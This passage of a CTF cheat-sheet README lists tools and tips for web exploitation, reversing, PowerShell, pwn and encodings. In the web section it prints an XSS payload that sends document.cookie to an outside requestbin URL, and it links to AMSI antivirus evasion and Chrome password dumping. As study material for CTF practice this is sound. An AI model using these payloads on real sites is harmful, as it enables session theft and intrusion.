 629 | 	A classic CTF challenge is to leave a `git` repository live and available on a website. You can see this with `nmap -A` (or whatever specific script catches it) and just by trying to view that specific folder, `/.git/`. A good command-line tool for this is [`GitDumper.sh`](https://github.com/internetwache/GitTools), or just simply using [`wget`][wget].
 630 | 
 631 | * [`GitDumper.sh`][GitDumper.sh]
 632 | 	
 633 | 	A command-line tool that will automatically scrape and download a [git] repository hosted online with a given URL.
 634 | 
 635 | * [XSS]/[Cross-site scripting]
 636 | 
 637 | 	[XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet). [Cross-site scripting], vulnerability where the user can control rendered [HTML] and ideally inject [JavaScript] code that could drive a browser to any other website or make any malicious network calls. Example test payload is as follows:
 638 | 
 639 | ```
 640 | <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
 641 | ```
 642 | 
 643 | 	Typically you use this to steal cookies or other information, and you can do this with an online requestbin.
 644 | 
 645 | ```
 646 | <img src="#" onerror="document.location='http://requestbin.fullcontact.com/168r30u1?c' + document.cookie">
 647 | ```
 648 | 
 649 | * [CloudFlare Bypass](https://github.com/Anorov/cloudflare-scrape)
 650 | 
 651 | 	If you need to script or automate against a page that uses the I'm Under Attack Mode from CloudFlare, or DDOS protection, you can do it like this with linked Python module.
 652 | 	
 653 | ``` python
 654 | #!/usr/bin/env python
 655 | 
 656 | import cfscrape
 657 | 
 658 | url = 'http://yashit.tech/tryharder/'
 659 | 
 660 | scraper = cfscrape.create_scraper() 
 661 | print scraper.get(url).content 
 662 | ```
 663 | 
 664 | * [XSStrike]
 665 | 
 666 | 	A command-line tool for automated [XSS] attacks. Seems to function like how [sqlmap] does.
 667 | 
 668 | * [`wpscan`][wpscan]
 669 | 
 670 | 	* A Ruby script to scan and do reconnaissance on a [Wordpress] application. 
 671 | 	
 672 | * Cookie Catcher
 673 | 
 674 | * [`requestb.in`](https://requestb.in/)
 675 | 
 676 | 	A free tool and online end-point that can be used to catch HTTP requests. Typically these are controlled and set by finding a [XSS] vulnerabilty.
 677 | 
 678 | * [`hookbin.com`](https://hookbin.com/)
 679 | 
 680 | 	A free tool and online end-point that can be used to catch HTTP requests. Typically these are controlled and set by finding a [XSS] vulnerabilty.
 681 | 
 682 | * [`sqlmap`][sqlmap]
 683 | 
 684 | 	A command-line tool written in [Python] to automatically detect and exploit vulnerable SQL injection points.	
 685 | 
 686 | * Flask Template Injection
 687 | 
 688 | 	[https://nvisium.com/resources/blog/2015/12/07/injecting-flask.html](https://nvisium.com/resources/blog/2015/12/07/injecting-flask.html), [https://nvisium.com/resources/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html](https://nvisium.com/resources/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html), [https://nvisium.com/resources/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii.html](https://nvisium.com/resources/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii.html)
 689 | 
 690 | 
 691 | * SQL `IF` statements
 692 | 
 693 | 	These are handy for some injections and setting up some Blind SQL if you need to. Syntax is like `SELECT ( IF ( 1=1, "Condition successful!", "Condition errored!" ) )`
 694 | 
 695 | * Explicit SQL Injection
 696 | 
 697 | 	
 698 | 
 699 | * Blind SQL Injection
 700 | 
 701 | 	
 702 | 
 703 | 
 704 | * gobuster
 705 | 	
 706 | 	
 707 | 
 708 | * DirBuster
 709 | 
 710 | * `nikto`
 711 | 
 712 | 
 713 | * Burpsuite
 714 | 	
 715 | 
 716 | 
 717 | Reverse Engineering
 718 | -------------------
 719 | 
 720 | * `ltrace` and `strace`
 721 | 
 722 | 	Easy command-line tools to see some of the code being executed as you follow through a binary. Usage: `ltrace ./binary`
 723 | 
 724 | * Hopper
 725 | 
 726 | * Binary Ninja
 727 | 
 728 | * gdb
 729 | 
 730 | * IDA
 731 | 
 732 | 
 733 | 
 734 | 
 735 | PowerShell
 736 | -------------
 737 | 
 738 | * [nishang]
 739 | 
 740 | 	A PowerShell suite of tools for pentesting. Has support for an ICMP reverse shell!
 741 | 
 742 | * [Empire]
 743 | 
 744 | 	HUGE PowerShell library and tool to do a lot of post-exploitation.
 745 | 
 746 | * [Bypass AMSI Anti-Malware Scan Interface](https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html?mkt_tok=eyJpIjoiWTJGaU5qbGlaVFZsTXpVdyIsInQiOiJBSXdzQm5FMGY0S1BrTWlBcVBlZ3ErN2NcL1RNeGkwcnNSK3FZcGVvaUhFRVJiQUhVcmVIWko0aWdNNCtXcVRrcWtDRTMxRGlpM1wvQlIxVHZlU1RUNk5sRVJnQ1dUZEFVQ0JTRHk4ejNVQTBWK1Y3Um1EWHZYdGY5YWQ5V2hTZFVXIn0%3D)
 747 | 
 748 | 	Great tool and guide for anti-virus evasion with PowerShell.
 749 | 
 750 | 
 751 | Windows Executables
 752 | -------------
 753 | 
 754 | * [`pefile`][pefile]
 755 | 
 756 | 	A [Python] module that examines the headers in a Windows [PE (Portable Executable)][PE] file. 
 757 | 
 758 | * [dnSpy]
 759 | 
 760 | 	A [Windows] GUI tool to decompile and reverse engineer [.NET] binaries
 761 | 
 762 | * [PEiD][PEiD]
 763 | 
 764 | 	A [Windows] tool to detect common packers, cryptors and compilers for [Windows][Windows] [PE][PE] 
 765 | 
 766 | * jetBrains .NET decompiler
 767 | 
 768 | * AutoIT converter
 769 | 
 770 | 	When debugging AutoIT programs, you may get a notification: "This is a compiled AutoIT script". Here is a good thing to use to decode them: [https://www.autoitscript.com/site/autoit/downloads/](https://www.autoitscript.com/site/autoit/downloads/)
 771 | 	
 772 | Python Reversing
 773 | ------------
 774 | 
 775 | * [Easy Python Decompiler]
 776 | 
 777 | 	A small `.exe` GUI application that will "decompile" [Python] bytecode, often seen in `.pyc` extension. The tool runs reliably on [Linux] with [Wine].
 778 | 
 779 | 
 780 | 
 781 | Binary Exploitation/pwn
 782 | --------------
 783 | 
 784 | * Basic Stack Overflow
 785 | 
 786 | 	Use `readelf -s <binary>` to get the location of a function to jump to -- overflow in Python, find offset with `dmesg`, and jump.	
 787 | 
 788 | * `printf` vulnerability
 789 | 
 790 | 	A C binary vulnerability, where `printf` is used with user-supplied input without any arguments. Hand-made code to exploit and overwrite functions: [https://pastebin.com/0r4WGn3D](https://pastebin.com/0r4WGn3D) and a video walkthrough explaining: [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
 791 | 
 792 | * [`formatStringExploiter`][formatStringExploiter]
 793 | 
 794 | 	A good [Python] module to streamline exploiting a [format string vulnerability]. THIS IS NOT ALWAYS A GOOD TACTIC...
 795 | 
 796 | * 64-bit Buffer Overflow
 797 | 
 798 | 	64-bit buffer overflow challenges are often difficult because the null bytes get in the way of memory addresses (for the function you want to jump to, that you can usually find with `readelf -s`). But, check if whether or not the function address you need starts with the same hex values already on the stack (in `rsp`). Maybe you only have to write two or three bytes after the overflow, rather than the whole function address. 
 799 | 
 800 | 
 801 | VisualBasicScript Reversing
 802 | ---------------------------
 803 | 
 804 | 
 805 | Miscellaneous
 806 | ----------
 807 | 
 808 | 
 809 | 
 810 | * [Base64], [Base32], [Base85]
 811 | 
 812 | ```
 813 | Base64:
 814 | TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz
 815 | IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg
 816 | dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu
 817 | dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLCBleGNlZWRzIHRo
 818 | ZSBzaG9ydCB2ZWhlbWVuY2Ugb2YgYW55IGNhcm5hbCBwbGVhc3VyZS4=
 819 | ```
 820 | 
 821 | ```
 822 | Base32
 823 | ORUGS4ZANFZSAYLOEBSXQYLNOBWGKIDPMYQGEYLTMUZTELRANF2CA2LTEB3GS43JMJWGKIDCPEQGY33UOMQG6ZRAMNQXA2LUMFWCA3DFOR2GK4TTEBQW4ZBANVXXEZJAMVYXKYLMOMQHG2LHNZZSAZTPOIQHAYLEMRUW4ZZMEBSXQ5DSME======
 824 | ```
 825 | 
 826 | ```
 827 | Base85:
 828 | <~9jqo^BlbD-BleB1DJ+*+F(f,q/0JhKF<GL>Cj@.4Gp$d7F!,L7@<6@)/0JDEF<G%<+EV:2F!,
 829 | O<DJ+*.@<*K0@<6L(Df-\0Ec5e;DffZ(EZee.Bl.9pF"AGXBPCsi+DGm>@3BB/F*&OCAfu2/AKY
 830 | i(DIb:@FD,*)+C]U=@3BN#EcYf8ATD3s@q?d$AftVqCh[NqF<G:8+EV:.+Cf>-FD5W8ARlolDIa
 831 | l(DId<j@<?3r@:F%a+D58'ATD4$Bl@l3De:,-DJs`8ARoFb/0JMK@qB4^F!,R<AKZ&-DfTqBG%G
 832 | >uD.RTpAKYo'+CT/5+Cei#DII?(E,9)oF*2M7/c~>
 833 | ```
 834 | 
 835 | * [Base65535](https://github.com/qntm/base65536)
 836 | 
 837 | 
 838 | 	Unicode characters encoding. Includes a lot of seemingly random spaces and chinese characters!
 839 | 
 840 | ```
 841 | ?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
 842 | ```
 843 | 
 844 | * [Base41](https://github.com/sveljko/base41/blob/master/python/base41.py) 
 845 | 
 846 | 
 847 | * Wordsearches
 848 | 
 849 | 	Some CTFs have me solve wordsearchs as part of a challenge (TJCTF 2018). This code is super helpful: [https://github.com/robbiebarrat/word-search](https://github.com/robbiebarrat/word-search)
 850 | 
 851 | 
 852 | * Password-protected Zip Files:  [`fcrackzip`][fcrackzip] and `zip2john.py`
 853 | 
 854 | 	Use
 855 | 
 856 | * 15 Puzzle
 857 | 	
 858 | 	A sliding puzzle that consists of a 4x4 grid with numbered square tiles, with one missing, set in a random order. It was involved in SharifCTF to determine if a group of these puzzles was solvable: [https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/](https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/)
 859 | 
 860 | 
 861 | 
 862 | * Chrome Password Dump
 863 | 
 864 | 	A [Windows] command-line tool to dump passwords saved with Google Chrome.
 865 | 	[http://securityxploded.com/chrome-password-dump.php](http://securityxploded.com/chrome-password-dump.php)
 866 | 
 867 | * `img2txt`
 868 | 
 869 | 	A command-line tool to convert an image into ASCII for the terminal. Can be installed like so:
 870 | 
 871 | ```
 872 | sudo apt install -y caca-utils
 873 | ```
 874 | 
 875 | 
 876 | * Strange Symbols/Characters
 877 | 
 878 | 	Some CTFs will try and hide a message on a picture with strange symbols. Try and Google Reverse Image searcht these. They may be Egyptian Characters: 
 879 | 
 880 | ![http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif](http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif)
 881 | 
 882 | 
 883 | [steghide]: http://steghide.sourceforge.net/
 884 | [snow]: http://www.darkside.com.au/snow/
 885 | [cribdrag.py]: https://github.com/SpiderLabs/cribdrag
 886 | [cribdrag]: https://github.com/SpiderLabs/cribdrag
 887 | [pcap]: https://en.wikipedia.org/wiki/Pcap
 888 | [PCAP]: https://en.wikipedia.org/wiki/Pcap
 889 | [Wireshark]: https://www.wireshark.org/
 890 | [Network Miner]: http://www.netresec.com/?page=NetworkMiner
 891 | [PCAPNG]: https://github.com/pcapng/pcapng
 892 | [pcapng]: https://github.com/pcapng/pcapng
 893 | [pdfcrack]: http://pdfcrack.sourceforge.net/index.html
 894 | [GitDumper.sh]: https://github.com/internetwache/GitTools
 895 | [pefile]: https://github.com/erocarrera/pefile
 896 | [Python]: https://www.python.org/
 897 | [PE]: https://en.wikipedia.org/wiki/Portable_Executable
 898 | [Portable Executable]: https://en.wikipedia.org/wiki/Portable_Executable
 899 | [hipshot]: https://bitbucket.org/eliteraspberries/hipshot
 900 | [QR code]: https://en.wikipedia.org/wiki/QR_code
 901 | [QR codes]: https://en.wikipedia.org/wiki/QR_code
 902 | [QR]: https://en.wikipedia.org/wiki/QR_code
 903 | [zbarimg]: https://linux.die.net/man/1/zbarimg
 904 | [Linux]: https://en.wikipedia.org/wiki/Linux
 905 | [Ubuntu]: https://en.wikipedia.org/wiki/Ubuntu_(operating_system)
 906 | [Wine]: https://en.wikipedia.org/wiki/Wine_(software)
 907 | [Detect DTMF Tones]: http://dialabc.com/sound/detect/index.html
 908 | [dnSpy]: https://github.com/0xd4d/dnSpy
 909 | [Windows]: https://en.wikipedia.org/wiki/Microsoft_Windows
 910 | [.NET]: https://en.wikipedia.org/wiki/.NET_Framework
 911 | [Vigenere Cipher]: https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher
 912 | [PDF]: https://en.wikipedia.org/wiki/Portable_Document_Format
 913 | [Playfair Cipher]: https://en.wikipedia.org/wiki/Playfair_cipher
 914 | [phpdc.phpr]:https://github.com/lighttpd/xcache/blob/master/bin/phpdc.phpr
 915 | [bcompiler]: http://php.net/manual/en/book.bcompiler.php
 916 | [PHP]: https://en.wikipedia.org/wiki/PHP
 917 | [GET]: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Request_methods
 918 | [pdfdetach]: https://www.systutorials.com/docs/linux/man/1-pdfdetach/
 919 | [sqlmap]: https://github.com/sqlmapproject/sqlmap
 920 | [hachoir-subfile]: https://pypi.python.org/pypi/hachoir-subfile/0.5.3
 921 | [wget]: https://en.wikipedia.org/wiki/Wget
 922 | [git]: https://git-scm.com/
 923 | [Cross-site scripting]: https://en.wikipedia.org/wiki/Cross-site_scripting
 924 | [XSS]: https://en.wikipedia.org/wiki/Cross-site_scripting
 925 | [HTML]: https://en.wikipedia.org/wiki/HTML
 926 | [JavaScript]: https://en.wikipedia.org/wiki/JavaScript
 927 | [PEiD]: https://www.aldeid.com/wiki/PEiD
 928 | [wpscan]: https://wpscan.org/
 929 | [Ruby]: https://www.ruby-lang.org/en/
 930 | [Wordpress]: https://en.wikipedia.org/wiki/WordPress
 931 | [dumpzilla]: http://www.dumpzilla.org/
 932 | [hexed.it]: https://hexed.it/
 933 | [Magic Numbers]: https://en.wikipedia.org/wiki/Magic_number_(programming)#Magic_numbers_in_files
 934 | [Magic Number]: https://en.wikipedia.org/wiki/Magic_number_(programming)#Magic_numbers_in_files
 935 | [Edit This Cookie]: http://www.editthiscookie.com/
 936 | [cookie]: https://en.wikipedia.org/wiki/HTTP_cookie
 937 | [cookies]: https://en.wikipedia.org/wiki/HTTP_cookie
 938 | [formatStringExploiter]: http://formatstringexploiter.readthedocs.io/en/latest/index.html
 939 | [format string vulnerability]: https://www.owasp.org/index.php/Format_string_attack
 940 | [printf vulnerability]: https://www.owasp.org/index.php/Format_string_attack
 941 | [Java]: https://en.wikipedia.org/wiki/Java_(programming_language)
 942 | [JAR]: https://en.wikipedia.org/wiki/JAR_(file_format)
 943 | [OpenStego]: https://www.openstego.com/
 944 | [Stegsolve.jar]: http://www.caesum.com/handbook/stego.htm
 945 | [Stegsolve]: http://www.caesum.com/handbook/stego.htm
 946 | [PcapXray]: https://github.com/Srinivas11789/PcapXray
 947 | [Atbash Cipher]: https://en.wikipedia.org/wiki/Atbash
 948 | [TestDisk]: https://www.cgsecurity.org/Download_and_donate.php/testdisk-7.1-WIP.linux26.tar.bz2
 949 | [PNG]: https://en.wikipedia.org/wiki/Portable_Network_Graphics
 950 | [jd-gui]: https://github.com/java-decompiler/jd-gui
 951 | [dex2jar]: https://github.com/pxb1988/dex2jar
 952 | [apktool]: https://ibotpeaches.github.io/Apktool/
 953 | [RCE]: https://en.wikipedia.org/wiki/Arbitrary_code_execution
 954 | [remote code execution]: https://en.wikipedia.org/wiki/Arbitrary_code_execution
 955 | [arbitrary code execution]: https://en.wikipedia.org/wiki/Arbitrary_code_execution
 956 | [XSStrike]: https://github.com/UltimateHackers/XSStrike
 957 | [nishang]: https://github.com/samratashok/nishang
 958 | [Malboge]: https://en.wikipedia.org/wiki/Malbolge
 959 | [Piet]: https://esolangs.org/wiki/Piet
 960 | [npiet]: https://www.bertnase.de/npiet/
 961 | [LC4]: https://www.schneier.com/blog/archives/2018/05/lc4_another_pen.html
 962 | [Empire]: https://github.com/EmpireProject/Empire
 963 | [Base64]: https://en.wikipedia.org/wiki/Base64
 964 | [Base32]: https://en.wikipedia.org/wiki/Base32
 965 | [Base85]: https://en.wikipedia.org/wiki/Ascii85
 966 | [fcrackzip]: https://github.com/hyc/fcrackzip
 967 | [zsteg]: https://github.com/zed-0xff/zsteg
 968 | [jsteg]: https://github.com/lukechampine/jsteg
 969 | [jstego]: https://sourceforge.net/projects/jstego/
 970 | [StegCracker]: https://github.com/Paradoxis/StegCracker
 971 | [Base41]: https://github.com/sveljko/base41/blob/master/python/base41.py
 972 | [Base65535]: https://github.com/qntm/base65536
 973 | [Easy Python Decompiler]: https://github.com/aliansi/Easy-Python-Decompiler-v1.3.2
 974 | 
 975 | 
 976 | ---------------------------
 977 | [Extra Readings and Tools](https://github.com/thezakman/CTF-Heaven/tree/master/extra)
 978 | -----------------------
 979 | 
 980 | A list of interesting things I can use one day or have already used in the past.
 981 | 
 982 | * [android-tools](extra/android-tools.md)
 983 | * [blockchain-tools](extra/blockchain-tools.md)
 984 | * [blogs](extra/blogs.md)
 985 | * [car-tools](extra/car-tools.md)
 986 | * [cloud-tools](extra/cloud-tools.md)
 987 | * [cobalt-strike-addons](extra/cobalt-strike-addons.md)
 988 | * [code-audit](extra/code-audit.md)
 989 | * [ctf-tools](extra/ctf-tools.md)
 990 | * [database-tools](extra/database-tools.md)
 991 | * [docker-tools](extra/docker-tools.md)
 992 | * [exploit-development.md](extra/exploit-development.md)
 993 | * [exploit-latest](extra/exploit-latest.md)
 994 | * [forensics-tools](extra/forensics-tools.md)
 995 | * [fuzzing-tools](extra/fuzzing-tools.md)
 996 | * [hail-mary-attack](extra/hail-mary-attack.md)
 997 | * [hardening](extra/hardening.md)
 998 | * [hardware-tools](extra/hardware-tools.md)
 999 | * [honeypot](extra/honeypot.md)
1000 | * [ios-tools](extra/ios-tools.md)
1001 | * [iot-tools](extra/iot-tools.md)
1002 | * [machine-learning](extra/machine-learning.md)
1003 | * [macos-tools](extra/macos-tools.md)
1004 | * [malware-analysis](extra/malware-analysis.md)
1005 | * [malware-development](extra/malware-development.md)
1006 | * [masscan](extra/masscan.md)
1007 | * [nmap](extra/nmap.md)
1008 | * [office-tools](extra/office-tools.md)
1009 | * [password-tool](extra/password-tool.md)
1010 | * [payloads](extra/payloads.md)
1011 | * [pentest-tools](extra/pentest-tools.md)
1012 | * [powershell-tools](extra/powershell-tools.md)
1013 | * [pwn-tips](extra/pwn-tips.md)
1014 | * [re-tools](extra/re-tools.md)
1015 | * [router-tools](extra/router-tools.md)
1016 | * [sdr-tools](extra/sdr-tools.md)
1017 | * [shellcode-tools](extra/shellcode-tools.md)
1018 | * [software-development](extra/software-development.md)
1019 | * [threat-detection](extra/threat-detection.md)
1020 | * [wireless-tools](extra/wireless-tools.md)
1021 | 
1022 | 
1023 | -------------------------
1024 | 
1025 | ## Happy Hacking !!
1026 | 
1027 | 


--------------------------------------------------------------------------------
/pastel1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RajChowdhury240/CTF-CheatSheet/a1a9a2a87bcaabfe1c942878f2892f9aea15e60f/pastel1.png


--------------------------------------------------------------------------------
/thankks.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RajChowdhury240/CTF-CheatSheet/a1a9a2a87bcaabfe1c942878f2892f9aea15e60f/thankks.png


--------------------------------------------------------------------------------